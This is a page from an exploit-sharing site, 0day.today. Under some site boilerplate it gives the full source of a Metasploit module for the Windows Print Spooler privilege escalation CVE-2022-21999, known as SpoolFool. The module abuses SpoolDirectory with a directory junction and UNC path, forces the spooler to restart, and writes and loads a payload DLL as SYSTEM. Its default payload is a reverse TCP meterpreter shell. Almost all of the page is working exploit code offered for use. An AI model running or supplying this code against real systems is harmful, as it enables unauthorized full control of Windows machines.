0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Windows SpoolFool Privilege Escalation Exploit
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Post::File include Msf::Exploit::FileDropper include Msf::Post::Windows::FileSystem include Msf::Post::Windows::FileInfo include Msf::Post::Windows::Priv include Msf::Exploit::EXE def initialize(info = {}) super( update_info( info, 'Name' => 'CVE-2022-21999 SpoolFool Privesc', 'Description' => %q{ The Windows Print Spooler has a privilege escalation vulnerability that can be leveraged to achieve code execution as SYSTEM. The `SpoolDirectory`, a configuration setting that holds the path that a printer's spooled jobs are sent to, is writable for all users, and it can be configured via `SetPrinterDataEx()` provided the caller has the `PRINTER_ACCESS_ADMINISTER` permission. If the `SpoolDirectory` path does not exist, it will be created once the print spooler reinitializes. Calling `SetPrinterDataEx()` with the `CopyFiles\` registry key will load the dll passed in as the `pData` argument, meaning that writing a dll to the `SpoolDirectory` location can be loaded by the print spooler. Using a directory junction and UNC path for the `SpoolDirectory`, the exploit writes a payload to `C:\Windows\System32\spool\drivers\x64\4` and loads it by calling `SetPrinterDataEx()`, resulting in code execution as SYSTEM. }, 'License' => MSF_LICENSE, 'Author' => [ 'Oliver Lyak', # Vuln discovery and PoC 'Shelby Pace' # metasploit module ], 'Platform' => [ 'win' ], 'Arch' => ARCH_X64, 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Auto', { 'Platform' => 'win', 'Arch' => ARCH_X64, 'DefaultOptions' => { 'Payload' => 'windows/x64/meterpreter/reverse_tcp', 'PrependMigrate' => true } } ] ], 'Privileged' => true, 'References' => [ [ 'URL', 'https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81'], [ 'CVE', '2022-21999'] ], 'DisclosureDate' => '2022-02-08', 'DefaultTarget' => 0, 'Notes' => { 'AKA' => [ 'SpoolFool' ], 'Stability' => [ CRASH_SERVICE_RESTARTS ], 'Reliability' => [ UNRELIABLE_SESSION ], 'SideEffects' => [ ARTIFACTS_ON_DISK ] }, 'Compat' => { 'Meterpreter' => { 'Commands' => %w[ stdapi_railgun_api ] } } ) ) register_options( [ OptString.new('PATH', [ true, 'Path to hold the payload', '%TEMP%' ]), OptInt.new('WAIT_TIME', [ true, 'Time to wait in seconds for spooler to restart', 5 ]) ] ) end def check s_info = sysinfo['OS'] unless s_info =~ /windows/i return CheckCode::Safe('This module only supports Windows targets.') end _major, _minor, build, revision, _branch = file_version('C:\\Windows\\System32\\ntdll.dll') case s_info when /windows 7/i return CheckCode::Safe('Windows 7 is technically vulnerable, though it requires a reboot.') when /windows 10/i, /windows 2019\+/i, /windows 2016\+/i # 2019 gets reported as 2016 by meterpreter return CheckCode::Appears if build <= 18362 return CheckCode::Appears if revision < 1526 end CheckCode::Safe end def winspool session.railgun.winspool end def spoolss session.railgun.spoolss end def advapi32 session.railgun.advapi32 end def get_printer_name if target_is_server? return "#{get_default_printer}\x00" end "#{Rex::Text.rand_text_alpha(5..12)}\x00" end def target_is_server? s_info = sysinfo['OS'] s_info =~ /server/i || s_info =~ /\d{4}\+/ end # Windows usually has Print to PDF or XPS Document Writer # available by default def get_default_printer xps = 'Microsoft XPS Document Writer' pdf = 'Microsoft Print to PDF' local_const = session.railgun.const('PRINTER_ENUM_LOCAL') ret = winspool.EnumPrintersA( local_const, nil, 1, nil, 0, 8, 8 ) unless ret['pcbNeeded'] > 0 fail_with(Failure::UnexpectedReply, 'Failed to determine bytes needed for enumerating printers.') end bytes_needed = ret['pcbNeeded'] ret = winspool.EnumPrintersA( local_const, nil, 1, bytes_needed, bytes_needed, 8, 8 ) fail_with(Failure::UnexpectedReply, 'Failed to enumerate local printers.') unless ret['return'] printer_struct = ret['pPrinterEnum'] return xps if printer_struct.include?(xps) return pdf if printer_struct.include?(pdf) end def get_driver_name if @printer_name.include?('XPS') || !target_is_server? return "Microsoft XPS Document Writer v4\x00" end "Microsoft Print To PDF\x00" end # packs struct according to member types and data def get_printer_info_struct server_name = "#{Rex::Text.rand_text_alpha(5..12)}\x00" port_name = "LPT1:\x00" driver_name = get_driver_name print_proc_name = "winprint\x00" p_datatype = "RAW\x00" print_strs = "#{server_name}#{@printer_name}#{port_name}#{driver_name}#{print_proc_name}#{p_datatype}" base = session.railgun.util.alloc_and_write_string(print_strs) fail_with(Failure::UnexpectedReply, 'Failed to allocate strings for PRINTER_INFO_2 structure.') unless base print_info_struct = [ base + print_strs.index(server_name), base + print_strs.index(@printer_name), 0, base + print_strs.index(port_name), base + print_strs.index(driver_name), 0, 0, 0, 0, base + print_strs.index(print_proc_name), base + print_strs.index(p_datatype), 0, 0, client.railgun.const('PRINTER_ATTRIBUTE_LOCAL'), 0, 0, 0, 0, 0, 0, 0 ] # https://docs.microsoft.com/en-us/windows/win32/printdocs/printer-info-2 print_info_struct.pack('QQQQQQQQQQQQQLLLLLLLL') end def add_printer struct = get_printer_info_struct fail_with(Failure::UnexpectedReply, 'Failed to create PRINTER_INFO_2 STRUCT.') unless struct ret = winspool.AddPrinterA(nil, 2, struct) fail_with(Failure::UnexpectedReply, ret['ErrorMessage']) if ret['GetLastError'] != 0 print_good("Printer #{@printer_name} was successfully added.") ret['return'] end def set_spool_directory(handle, spool_dir) print_status("Setting spool directory: #{spool_dir}") ret = set_printer_data(handle, '\\', 'SpoolDirectory', spool_dir) unless ret['GetLastError'] == 0 fail_with(Failure::UnexpectedReply, 'Failed to set spool directory.') end end def restart_spooler(handle) print_status('Attempting to restart print spooler.') term_path = 'C:\\Windows\\System32\\AppVTerminator.dll' ret = set_printer_data(handle, 'CopyFiles\\', 'Module', term_path) unless ret['GetLastError'] == 0 fail_with(Failure::UnexpectedReply, 'Failed to terminate print spooler service.') end end def set_printer_data(handle, key_name, value_name, config_data) winspool.SetPrinterDataExA(handle, key_name, value_name, REG_SZ, config_data, config_data.length) end # set read / execute permissions on dll # first get the security info in order to modify it # and pass back to SetNamedSecurityInfo() def set_perms_on_payload obj_type = session.railgun.const('SE_FILE_OBJECT') sec_info = session.railgun.const('DACL_SECURITY_INFORMATION') ret = advapi32.GetNamedSecurityInfoA( @payload_path, obj_type, sec_info, nil, nil, 8, nil, 8 ) unless ret['return'] == 0 fail_with(Failure::UnexpectedReply, 'Failed to get payload security info.') end ret = advapi32.BuildExplicitAccessWithNameA( '\x00' * 48, 'SYSTEM', session.railgun.const('GENERIC_ALL'), session.railgun.const('GRANT_ACCESS'), session.railgun.const('NO_INHERITANCE') ) ea_struct = ret['pExplicitAccess'] if ea_struct.empty? fail_with(Failure::UnexpectedReply, 'Failed to retrieve EXPLICIT_ACCESS structure.') end ret = advapi32.SetEntriesInAclA(1, ea_struct, nil, 8) fail_with(Failure::UnexpectedReply, "Failed to create new ACL: #{ret['GetLastError']}") if ret['return'] != 0 # need to first access pointer to the new acl # in order to read the acl's header (8 bytes) to determine # size of entire acl structure new_acl_ptr = ret['NewAcl'].unpack('Q').first acl_header = session.railgun.util.memread(new_acl_ptr, 8) # https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-acl acl_mems = acl_header.unpack('CCSSS') struct_size = acl_mems&.at(2) unless struct_size fail_with(Failure::UnexpectedReply, 'Failed to retrieve size of ACL structure.') end acl_struct = session.railgun.util.memread(new_acl_ptr, struct_size) ret = advapi32.SetNamedSecurityInfoA( @payload_path, obj_type, sec_info, nil, nil, acl_struct, nil ) fail_with(Failure::UnexpectedReply, 'Failed to set permissions on payload.') if ret['return'] != 0 print_status('Payload should have read / execute permissions now.') end def open_printer print_ptr = session.railgun.util.alloc_and_write_string('RAW') lp_default = [ print_ptr, 0, session.railgun.const('PRINTER_ACCESS_ADMINISTER') ] lp_default_struct = lp_default.pack('QQS') winspool.OpenPrinterA(@printer_name, 8, lp_default_struct) end def dir_path datastore['PATH'] end def count datastore['WAIT_TIME'] end def to_unc(path) path.gsub('C:', '\\\\\localhost\\C$') end def write_and_load_dll(handle) payload_name = "#{Rex::Text.rand_text_alpha(5..12)}.dll" payload_data = generate_payload_dll @payload_path = "#{@v4_dir}\\#{payload_name}" register_file_for_cleanup(@payload_path) register_dir_for_cleanup(@v4_dir) print_status("Writing payload to #{@payload_path}.") unless write_file(@payload_path, payload_data) fail_with(Failure::UnexpectedReply, 'Failed to write payload.') end print_status('Attempting to set permissions for payload.') set_perms_on_payload set_printer_data(handle, 'CopyFiles\\', 'Module', @payload_path) end def exploit fail_with(Failure::None, 'Already running as SYSTEM') if is_system? unless session.arch == ARCH_X64 fail_with(Failure::BadConfig, 'This exploit only supports x64 sessions') end @printer_name = get_printer_name tmp_dir = Rex::Text.rand_text_alpha(5..12) tmp_path = expand_path("#{dir_path}\\#{tmp_dir}") # the user name may get truncated which won't work # when setting the UNC path dirs = tmp_path.split('\\') if dirs.index('Users') full_uname = client.sys.config.getuid.split('\\').last dirs[dirs.index('Users') + 1] = full_uname tmp_path = dirs.join('\\') end print_status("Making base directory: #{tmp_path}") unless mkdir(tmp_path) fail_with(Failure::NoAccess, 'Permissions may be insufficient.' \ 'Consider choosing a different base path for the exploit.') end handle = nil if target_is_server? ret = open_printer fail_with(Failure::UnexpectedReply, 'Failed to open default printer.') unless ret['return'] handle = ret['phPrinter'] else handle = add_printer end driver_dir = 'C:\\Windows\\System32\\spool\\drivers\\x64' @v4_dir = "#{driver_dir}\\4" fail_with(Failure::NotFound, 'Driver directory not found.') unless directory?(driver_dir) # if directory already exists, attempt the exploit if directory?(@v4_dir) print_status('v4 directory already exists.') else set_spool_directory(handle, to_unc("#{tmp_path}\\4")) print_status("Creating junction point: #{tmp_path} -> #{driver_dir}") junction = create_junction(tmp_path, driver_dir) fail_with(Failure::UnexpectedReply, 'Failed to create junction point.') unless junction # now restart spooler to create spool directory print_status('Creating the spool directory by restarting spooler...') restart_spooler(handle) print_status("Sleeping for #{count} seconds.") Rex.sleep(count) ret = open_printer unless ret['return'] fail_with(Failure::Unreachable, 'The print spooler service failed to start.') end handle = ret['phPrinter'] unless directory?(@v4_dir) fail_with(Failure::UnexpectedReply, 'Directory was not created.') end print_good('Directory was successfully created.') end write_and_load_dll(handle) ensure if handle && !target_is_server? spoolss.DeletePrinter(handle) end spoolss.ClosePrinter(handle) unless handle.nil? end end # 0day.today [2024-06-03] #